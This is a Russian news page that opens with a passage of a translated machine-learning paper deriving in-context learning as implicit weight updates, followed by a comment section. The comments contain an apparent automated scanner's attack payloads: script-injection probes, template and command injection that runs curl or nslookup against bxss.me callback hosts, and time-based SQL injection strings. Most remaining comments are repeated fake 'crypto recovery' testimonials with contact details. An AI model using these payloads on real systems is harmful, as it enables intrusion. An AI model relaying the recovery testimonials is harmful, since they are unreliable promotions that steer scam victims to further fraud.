Подставляя теперь ΔW(Y) из определения и используя, что $\frac{z^{T}}{\lVert z\rVert^{2}}, z = 1$ , получаем

$\Delta W(Y)\,A(C\setminus Y, x) = \frac{(W\,\Delta A(Y))\,A(C\setminus Y, x)^{T}}{\lVert A(C\setminus Y, x)\rVert^{2}}\,A(C\setminus Y, x) = W\,\Delta A(Y).$

Следовательно, получаем

$T_{W(Y),\,b'(Y)}\!\bigl(C\setminus Y, x\bigr) = x + A(C\setminus Y, x) + \Delta A(Y) + W'\, g_{\theta}\!\left( W\big(A(C\setminus Y, x)+\Delta A(Y)\big) + b \right) + b'$

Поскольку по определению контекстного вектора $A(C\setminus Y, x) + \Delta A(Y) = A(C, x)$ , в итоге имеем

$T_{W(Y),\,b'(Y)}\!\bigl(C\setminus Y, x\bigr) = x + A(C,x) + W'\, g_{\theta}\!\big(WA(C,x) + b\big) + b' = T_{W,\,b'}(C,x)$

чем доказательство завершается.

Заметим, что обновление вектора смещения $\Delta b'(Y)$ по духу напоминает векторы функций из [27], выходы транскодера из [28] или латентные представления концептов из [29], используемые для редактирования весов трансформера. Также отметим, что данная теорема применима не только к контекстным слоям вида Pre-LN-блоков трансформера, как в [26], но и к другим типам контекстных слоёв — например, к слоям в рекуррентных моделях Griffin с локальным вниманием [21].

B. Альтернативная неявная динамика обучения ICL

В этом разделе мы описываем альтернативную неявную динамику обучения, получающуюся при итеративном применении Теоремы 2.2. Она выявляет неявную динамику обновления весов, порождённую вкладом каждого контекстного токена в выход контекстного блока. Это означает, что пока блок трансформера генерирует первый ответный токен, явного обновления весов не выполняется, однако фактический выход эквивалентен выходу того же контекстного блока без контекста, для которого в весовом пространстве произошла неявная динамика обучения. Ниже мы описываем эту динамику. А именно, начиная с начальной матрицы весов W_0 первого полносвязного слоя нейросети $M_{W_0}$ :

$T_{W_{0}}(c_{1},\ldots,c_{n},x) = T_{\,W_{0}+\Delta W_{0}(c_{1})}(c_{2},\ldots,c_{n},x) \tag{27}$

что даёт первое обновление весов, соответствующее эффекту токена c_1 на матрицу весов первого слоя:

$W_{1} = W_{0} + \frac{\bigl(W_{0}\,\Delta A(c_{1})\bigr)\,A(c_{2},\ldots,c_{n},x)^{T}} {\lVert A(c_{2},\ldots,c_{n},x)\rVert^{2}} \tag{28}$

Если продолжать этот процесс итеративно, получаем следующее обновление весов, соответствующее «поглощению» второго токена:

$T_{W_{1}}(c_{2},\ldots,c_{n},x) = T_{\,W_{1}+\Delta W_{1}(c_{2})}(c_{3},\ldots,c_{n},x) \tag{29}$

откуда

$W_{2} = W_{1} + \frac{\bigl(W_{1}\,\Delta A(c_{2})\bigr)\,A(c_{3},\ldots,c_{n},x)^{T}} {\lVert A(c_{3},\ldots,c_{n},x)\rVert^{2}} \tag{30}$

Итак, итеративный процесс неявных обновлений весов для каждого следующего токена можно суммировать так.

Следствие B.0.1. В использованной выше нотации, итеративный процесс обновлений весов имеет вид

$W_{i} = W_{i-1} + \frac{\bigl(W_{i-1}\,\Delta A(c_{i})\bigr)\,A(c_{i+1},\ldots,c_{n},x)^{T}} {\lVert A(c_{i+1},\ldots,c_{n},x)\rVert^{2}} \tag{31}$

где начальные веса первого полносвязного слоя W_0 моделируют перенос информации из токена промпта c_i в веса контекстного блока. Иначе говоря, выполняется следующее

$T_{W_{i}}(c_{i+1},\ldots,c_{n},x) = T_{W_{0}}(c_{1},\ldots,c_{n},x), \tag{32}$

для всех где $\Delta A(c_{i}) = A(c_{i},\ldots,c_{n},x) - A(c_{i+1},\ldots,c_{n},x).$

Заметим, что ΔA(c_i) измеряет вклад токена контекста c_i в выход контекстного блока. Если c_i не влияет на выход (то есть ΔA(c_i)=0 ), соответствующее обновление исчезает. Обратите внимание, что обновление весов на шаге линейно по весам; а именно, его можно переписать как

$W_i = W_{i-1} + h_i\, W_{i-1} A_i = W_{i-1}\bigl(1 + h_i A_i\bigr) \quad\text{where}\quad A_i := \Delta A(c_i)\, A(c_{i+1},\ldots,c_n,x)^{T}. \tag{33}$

с адаптивной скоростью обучения

$h_i:=\frac{1}{\lVert A(c_{i+1},\ldots,c_n,x)\rVert^{2}} \tag{34}$

В частности, это даёт формулу факторизации для полной неявной матрицы весов, соответствующей эффекту контекста [c_1,…,c_n] на входной токен :

$W_{n} = W_{0}\,(1 + h_{1}A_{1})(1 + h_{2}A_{2})\cdots(1 + h_{n}A_{n}). \tag{35}$

Источник

Теги

Категория

Новости

Дата

25 сент. 2025 г.

09.10.25 08:11 pHqghUme

can I ask you a question please?
09.10.25 08:12 pHqghUme

can I ask you a question please?
09.10.25 08:12 pHqghUme

can I ask you a question please?
09.10.25 08:12 pHqghUme

is it ok if I upload an image?
09.10.25 08:13 pHqghUme

can I ask you a question please?'"()&%<zzz><ScRiPt >6BEP(9887)</ScRiPt>
09.10.25 08:13 pHqghUme

{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hityjalvnplljd6041.bxss.me")}}
09.10.25 08:13 pHqghUme

'"()&%<zzz><ScRiPt >6BEP(9632)</ScRiPt>
09.10.25 08:13 pHqghUme

can I ask you a question please?9425407
09.10.25 08:13 pHqghUme

is it ok if I upload an image?
09.10.25 08:14 pHqghUme

is it ok if I upload an image?
09.10.25 08:16 pHqghUme

e
09.10.25 08:17 pHqghUme

e
09.10.25 08:17 pHqghUme

e
09.10.25 08:17 pHqghUme

"+response.write(9043995*9352716)+"
09.10.25 08:17 pHqghUme

can I ask you a question please?
09.10.25 08:17 pHqghUme

can I ask you a question please?
09.10.25 08:17 pHqghUme

can I ask you a question please?
09.10.25 08:18 pHqghUme

can I ask you a question please?
09.10.25 08:18 pHqghUme

$(nslookup -q=cname hitconyljxgbe60e2b.bxss.me||curl hitconyljxgbe60e2b.bxss.me)
09.10.25 08:18 pHqghUme

is it ok if I upload an image?
09.10.25 08:18 pHqghUme

is it ok if I upload an image?
09.10.25 08:18 pHqghUme

|(nslookup -q=cname hitrwbjjcbfsjdad83.bxss.me||curl hitrwbjjcbfsjdad83.bxss.me)
09.10.25 08:18 pHqghUme

|(nslookup${IFS}-q${IFS}cname${IFS}hitmawkdrqdgobcdfd.bxss.me||curl${IFS}hitmawkdrqdgobcdfd.bxss.me)
09.10.25 08:18 pHqghUme

is it ok if I upload an image?
09.10.25 08:19 pHqghUme

is it ok if I upload an image?
09.10.25 08:20 pHqghUme

e
09.10.25 08:20 pHqghUme

e
09.10.25 08:21 pHqghUme

e
09.10.25 08:21 pHqghUme

e
09.10.25 08:21 pHqghUme

can I ask you a question please?
09.10.25 08:22 pHqghUme

can I ask you a question please?
09.10.25 08:22 pHqghUme

can I ask you a question please?
09.10.25 08:22 pHqghUme

is it ok if I upload an image?
09.10.25 08:22 pHqghUme

if(now()=sysdate(),sleep(15),0)
09.10.25 08:22 pHqghUme

can I ask you a question please?0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
09.10.25 08:23 pHqghUme

can I ask you a question please?0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
09.10.25 08:23 pHqghUme

can I ask you a question please?
09.10.25 08:23 pHqghUme

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
09.10.25 08:24 pHqghUme

is it ok if I upload an image?
09.10.25 08:24 pHqghUme

e
09.10.25 08:24 pHqghUme

can I ask you a question please?-1 waitfor delay '0:0:15' --
09.10.25 08:25 pHqghUme

is it ok if I upload an image?
09.10.25 08:25 pHqghUme

e
09.10.25 08:25 pHqghUme

e
09.10.25 08:25 pHqghUme

e
09.10.25 08:25 pHqghUme

can I ask you a question please?9IDOn7ik'; waitfor delay '0:0:15' --
09.10.25 08:26 pHqghUme

can I ask you a question please?MQOVJH7P' OR 921=(SELECT 921 FROM PG_SLEEP(15))--
09.10.25 08:26 pHqghUme

e
09.10.25 08:27 pHqghUme

can I ask you a question please?64e1xqge') OR 107=(SELECT 107 FROM PG_SLEEP(15))--
09.10.25 08:27 pHqghUme

can I ask you a question please?ODDe7Ze5')) OR 82=(SELECT 82 FROM PG_SLEEP(15))--
09.10.25 08:28 pHqghUme

can I ask you a question please?'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
09.10.25 08:28 pHqghUme

can I ask you a question please?'"
09.10.25 08:28 pHqghUme

can I ask you a question please?
09.10.25 08:28 pHqghUme

@@olQP6
09.10.25 08:28 pHqghUme

(select 198766*667891 from DUAL)
09.10.25 08:28 pHqghUme

(select 198766*667891)
09.10.25 08:30 pHqghUme

is it ok if I upload an image?
09.10.25 08:33 pHqghUme

can I ask you a question please?
09.10.25 08:34 pHqghUme

can I ask you a question please?
09.10.25 08:34 pHqghUme

if(now()=sysdate(),sleep(15),0)
09.10.25 08:35 pHqghUme

e
09.10.25 08:36 pHqghUme

is it ok if I upload an image?
09.10.25 08:36 pHqghUme

is it ok if I upload an image?
09.10.25 08:37 pHqghUme

is it ok if I upload an image?
09.10.25 08:37 pHqghUme

is it ok if I upload an image?
09.10.25 08:37 pHqghUme

e
09.10.25 08:37 pHqghUme

e
09.10.25 08:40 pHqghUme

can I ask you a question please?
09.10.25 08:40 pHqghUme

is it ok if I upload an image?
09.10.25 08:41 pHqghUme

e
09.10.25 08:41 pHqghUme

can I ask you a question please?
09.10.25 08:42 pHqghUme

can I ask you a question please?
09.10.25 08:42 pHqghUme

is it ok if I upload an image?
09.10.25 08:42 pHqghUme

e
09.10.25 11:05 marcushenderson624

Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
09.10.25 11:05 marcushenderson624

Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
09.10.25 11:05 marcushenderson624

Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
09.10.25 11:05 marcushenderson624

Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
11.10.25 04:41 luciajessy3

Don’t be deceived by different testimonies online that is most likely wrong. I have made use of several recovery options that got me disappointed at the end of the day but I must confess that the tech genius I eventually found is the best out here. It’s better you devise your time to find the valid professional that can help you recover your stolen or lost crypto such as bitcoins rather than falling victim of other amateur hackers that cannot get the job done. ADAMWILSON . TRADING @ CONSULTANT COM / WHATSAPP ; +1 (603) 702 ( 4335 ) is the most reliable and authentic blockchain tech expert you can work with to recover what you lost to scammers. They helped me get back on my feet and I’m very grateful for that. Contact their email today to recover your lost coins ASAP…
11.10.25 10:44 Tonerdomark

A thief took my Dogecoin and wrecked my life. Then Mr. Sylvester stepped in and changed everything. He got back €211,000 for me, every single cent of my gains. His calm confidence and strong tech skills rebuilt my trust. Thanks to him, I recovered my cash with no issues. After months of stress, I felt huge relief. I had full faith in him. If a scam stole your money, reach out to him today at { yt7cracker@gmail . com } His help sparked my full turnaround.
12.10.25 01:12 harristhomas7376

"In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
12.10.25 01:12 harristhomas7376

"In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
12.10.25 19:53 Tonerdomark

A crook swiped my Dogecoin. It ruined my whole world. Then Mr. Sylvester showed up. He fixed it all. He pulled back €211,000 for me. Not one cent missing from my profits. His steady cool and sharp tech know-how won back my trust. I got my money smooth and sound. After endless worry, relief hit me hard. I trusted him completely. Lost cash to a scam? Hit him up now at { yt7cracker@gmail . com }. His aid turned my life around. WhatsApp at +1 512 577 7957.
12.10.25 21:36 blessing

Writing this review is a joy. Marie has provided excellent service ever since I started working with her in early 2018. I was worried I wouldn't be able to get my coins back after they were stolen by hackers. I had no idea where to begin, therefore it was a nightmare for me. However, things became easier for me after my friend sent me to [email protected] and +1 7127594675 on WhatsApp. I'm happy that she was able to retrieve my bitcoin so that I could resume trading.
13.10.25 01:11 elizabethrush89

God bless Capital Crypto Recover Services for the marvelous work you did in my life, I have learned the hard way that even the most sensible investors can fall victim to scams. When my USD was stolen, for anyone who has fallen victim to one of the bitcoin binary investment scams that are currently ongoing, I felt betrayal and upset. But then I was reading a post on site when I saw a testimony of Wendy Taylor online who recommended that Capital Crypto Recovery has helped her recover scammed funds within 24 hours. after reaching out to this cyber security firm that was able to help me recover my stolen digital assets and bitcoin. I’m genuinely blown away by their amazing service and professionalism. I never imagined I’d be able to get my money back until I complained to Capital Crypto Recovery Services about my difficulties and gave all of the necessary paperwork. I was astounded that it took them 12 hours to reclaim my stolen money back. Without a doubt, my USDT assets were successfully recovered from the scam platform, Thank you so much Sir, I strongly recommend Capital Crypto Recover for any of your bitcoin recovery, digital funds recovery, hacking, and cybersecurity concerns. You reach them Call/Text Number +1 (336)390-6684 His Email: [email protected] Contact Telegram: @Capitalcryptorecover Via Contact: [email protected] His website: https://recovercapital.wixsite.com/capital-crypto-rec-1
13.10.25 01:11 elizabethrush89

God bless Capital Crypto Recover Services for the marvelous work you did in my life, I have learned the hard way that even the most sensible investors can fall victim to scams. When my USD was stolen, for anyone who has fallen victim to one of the bitcoin binary investment scams that are currently ongoing, I felt betrayal and upset. But then I was reading a post on site when I saw a testimony of Wendy Taylor online who recommended that Capital Crypto Recovery has helped her recover scammed funds within 24 hours. after reaching out to this cyber security firm that was able to help me recover my stolen digital assets and bitcoin. I’m genuinely blown away by their amazing service and professionalism. I never imagined I’d be able to get my money back until I complained to Capital Crypto Recovery Services about my difficulties and gave all of the necessary paperwork. I was astounded that it took them 12 hours to reclaim my stolen money back. Without a doubt, my USDT assets were successfully recovered from the scam platform, Thank you so much Sir, I strongly recommend Capital Crypto Recover for any of your bitcoin recovery, digital funds recovery, hacking, and cybersecurity concerns. You reach them Call/Text Number +1 (336)390-6684 His Email: [email protected] Contact Telegram: @Capitalcryptorecover Via Contact: [email protected] His website: https://recovercapital.wixsite.com/capital-crypto-rec-1
14.10.25 01:15 tyleradams

Hi. Please be wise, do not make the same mistake I had made in the past, I was a victim of bitcoin scam, I saw a glamorous review showering praises and marketing an investment firm, I reached out to them on what their contracts are, and I invested $28,000, which I was promised to get my first 15% profit in weeks, when it’s time to get my profits, I got to know the company was bogus, they kept asking me to invest more and I ran out of patience then requested to have my money back, they refused to answer nor refund my funds, not until a friend of mine introduced me to the NVIDIA TECH HACKERS, so I reached out and after tabling my complaints, they were swift to action and within 36 hours I got back my funds with the due profit. I couldn’t contain the joy in me. I urge you guys to reach out to NVIDIA TECH HACKERS on their email: [email protected]
14.10.25 08:46 robertalfred175

CRYPTO SCAM RECOVERY SUCCESSFUL – A TESTIMONIAL OF LOST PASSWORD TO YOUR DIGITAL WALLET BACK. My name is Robert Alfred, Am from Australia. I’m sharing my experience in the hope that it helps others who have been victims of crypto scams. A few months ago, I fell victim to a fraudulent crypto investment scheme linked to a broker company. I had invested heavily during a time when Bitcoin prices were rising, thinking it was a good opportunity. Unfortunately, I was scammed out of $120,000 AUD and the broker denied me access to my digital wallet and assets. It was a devastating experience that caused many sleepless nights. Crypto scams are increasingly common and often involve fake trading platforms, phishing attacks, and misleading investment opportunities. In my desperation, a friend from the crypto community recommended Capital Crypto Recovery Service, known for helping victims recover lost or stolen funds. After doing some research and reading multiple positive reviews, I reached out to Capital Crypto Recovery. I provided all the necessary information—wallet addresses, transaction history, and communication logs. Their expert team responded immediately and began investigating. Using advanced blockchain tracking techniques, they were able to trace the stolen Dogecoin, identify the scammer’s wallet, and coordinate with relevant authorities to freeze the funds before they could be moved. Incredibly, within 24 hours, Capital Crypto Recovery successfully recovered the majority of my stolen crypto assets. I was beyond relieved and truly grateful. Their professionalism, transparency, and constant communication throughout the process gave me hope during a very difficult time. If you’ve been a victim of a crypto scam, I highly recommend them with full confidence contacting: 📧 Email: [email protected] 📱 Telegram: @Capitalcryptorecover Contact: [email protected] 📞 Call/Text: +1 (336) 390-6684 🌐 Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
14.10.25 08:46 robertalfred175

CRYPTO SCAM RECOVERY SUCCESSFUL – A TESTIMONIAL OF LOST PASSWORD TO YOUR DIGITAL WALLET BACK. My name is Robert Alfred, Am from Australia. I’m sharing my experience in the hope that it helps others who have been victims of crypto scams. A few months ago, I fell victim to a fraudulent crypto investment scheme linked to a broker company. I had invested heavily during a time when Bitcoin prices were rising, thinking it was a good opportunity. Unfortunately, I was scammed out of $120,000 AUD and the broker denied me access to my digital wallet and assets. It was a devastating experience that caused many sleepless nights. Crypto scams are increasingly common and often involve fake trading platforms, phishing attacks, and misleading investment opportunities. In my desperation, a friend from the crypto community recommended Capital Crypto Recovery Service, known for helping victims recover lost or stolen funds. After doing some research and reading multiple positive reviews, I reached out to Capital Crypto Recovery. I provided all the necessary information—wallet addresses, transaction history, and communication logs. Their expert team responded immediately and began investigating. Using advanced blockchain tracking techniques, they were able to trace the stolen Dogecoin, identify the scammer’s wallet, and coordinate with relevant authorities to freeze the funds before they could be moved. Incredibly, within 24 hours, Capital Crypto Recovery successfully recovered the majority of my stolen crypto assets. I was beyond relieved and truly grateful. Their professionalism, transparency, and constant communication throughout the process gave me hope during a very difficult time. If you’ve been a victim of a crypto scam, I highly recommend them with full confidence contacting: 📧 Email: [email protected] 📱 Telegram: @Capitalcryptorecover Contact: [email protected] 📞 Call/Text: +1 (336) 390-6684 🌐 Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
14.10.25 08:46 robertalfred175

CRYPTO SCAM RECOVERY SUCCESSFUL – A TESTIMONIAL OF LOST PASSWORD TO YOUR DIGITAL WALLET BACK. My name is Robert Alfred, Am from Australia. I’m sharing my experience in the hope that it helps others who have been victims of crypto scams. A few months ago, I fell victim to a fraudulent crypto investment scheme linked to a broker company. I had invested heavily during a time when Bitcoin prices were rising, thinking it was a good opportunity. Unfortunately, I was scammed out of $120,000 AUD and the broker denied me access to my digital wallet and assets. It was a devastating experience that caused many sleepless nights. Crypto scams are increasingly common and often involve fake trading platforms, phishing attacks, and misleading investment opportunities. In my desperation, a friend from the crypto community recommended Capital Crypto Recovery Service, known for helping victims recover lost or stolen funds. After doing some research and reading multiple positive reviews, I reached out to Capital Crypto Recovery. I provided all the necessary information—wallet addresses, transaction history, and communication logs. Their expert team responded immediately and began investigating. Using advanced blockchain tracking techniques, they were able to trace the stolen Dogecoin, identify the scammer’s wallet, and coordinate with relevant authorities to freeze the funds before they could be moved. Incredibly, within 24 hours, Capital Crypto Recovery successfully recovered the majority of my stolen crypto assets. I was beyond relieved and truly grateful. Their professionalism, transparency, and constant communication throughout the process gave me hope during a very difficult time. If you’ve been a victim of a crypto scam, I highly recommend them with full confidence contacting: 📧 Email: [email protected] 📱 Telegram: @Capitalcryptorecover Contact: [email protected] 📞 Call/Text: +1 (336) 390-6684 🌐 Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
15.10.25 18:07 crypto

Cryptocurrency's digital realm presents many opportunities, but it also conceals complex frauds. It is quite painful to lose your cryptocurrency to scam. You can feel harassed and lost as a result. If you have been the victim of a cryptocurrency scam, this guide explains what to do ASAP. Following these procedures will help you avoid further issues or get your money back. Communication with Marie ([email protected] and WhatsApp: +1 7127594675) can make all the difference.
15.10.25 21:52 harristhomas7376

"In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
15.10.25 21:52 harristhomas7376

"In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
17.10.25 20:17 tyleradams

As time passes, there are an increasing number of frauds involving Bitcoin and other cryptocurrencies. Although there are many individuals who advertise recovering money online, people should use caution in dealing, especially when money is involved. You can trust NVIDIA TECH HACKERS [[email protected]], I promise. They are the top internet recovery company, and as their names indicate, your money is reclaimed as soon as feasible. My bitcoin was successfully retrieved in large part thanks to NVIDIA TECH HACKERS. Ensure that you get top-notch service; NVIDIA TECH HACKERS provides evidence of its work; and payment is only made when the service has been completed to your satisfaction. Reach them via email: [email protected] on google mail
17.10.25 20:20 lindseyvonn

Have you gotten yourself involved in a cryptocurrency scam or any scam at all? If yes, know that you are not alone, there are a lot of people in this same situation. I'm a Health Worker and was a victim of a cryptocurrency scam that cost me a lot of money. This happened a few weeks ago, there’s only one solution which is to talk to the right people, if you don’t do this you will end up being really depressed. I was really devastated until went on LinkedIn one evening after my work hours and i saw lots of reviews popped up on my feed about [email protected], I sent an email to the team who came highly recommended - [email protected] I started seeing some hope for myself from the moment I sent them an email. The good part is they made the entire process stress free for me, i literally sat and waited for them to finish and I received what I lost in my wallet
17.10.25 20:22 richardcharles

I would recommend NVIDIA TECH HACKERS to anyone that needs this service. I decided to get into crypto investment and I ended up getting my crypto lost to an investor late last year. The guy who was supposed to be managing my account turned out to be a scammer all along. I invested 56,000 USD and at first, my reading and profit margins were looking good. I started getting worried when I couldn’t make withdrawals and realized that I’ve been scammed. I came across some of the testimonials that people said about NVIDIA TECH HACKERS and how helpful he has been in recovering their funds. I immediately contacted him in his mail at [email protected] so I can get his assistance. One week into the recovery process the funds were traced and recovered back from the scammer. I can't appreciate him enough for his professionalism.
17.10.25 20:23 stevekalfman

If you need a hacker for scam crypto recovery or mobile spy access remotely kindly reach out to [email protected] for quick response, I hired this hacker and he did a nice job. before NVIDIA TECH HACKERS, I met with different hacker's online which turns out to be scam, this NVIDIA TECH HACKERS case was different and he is the trusted hacker I can vote and refer.
17.10.25 21:42 marcushenderson624

Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
17.10.25 21:42 marcushenderson624

Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
17.10.25 21:42 marcushenderson624

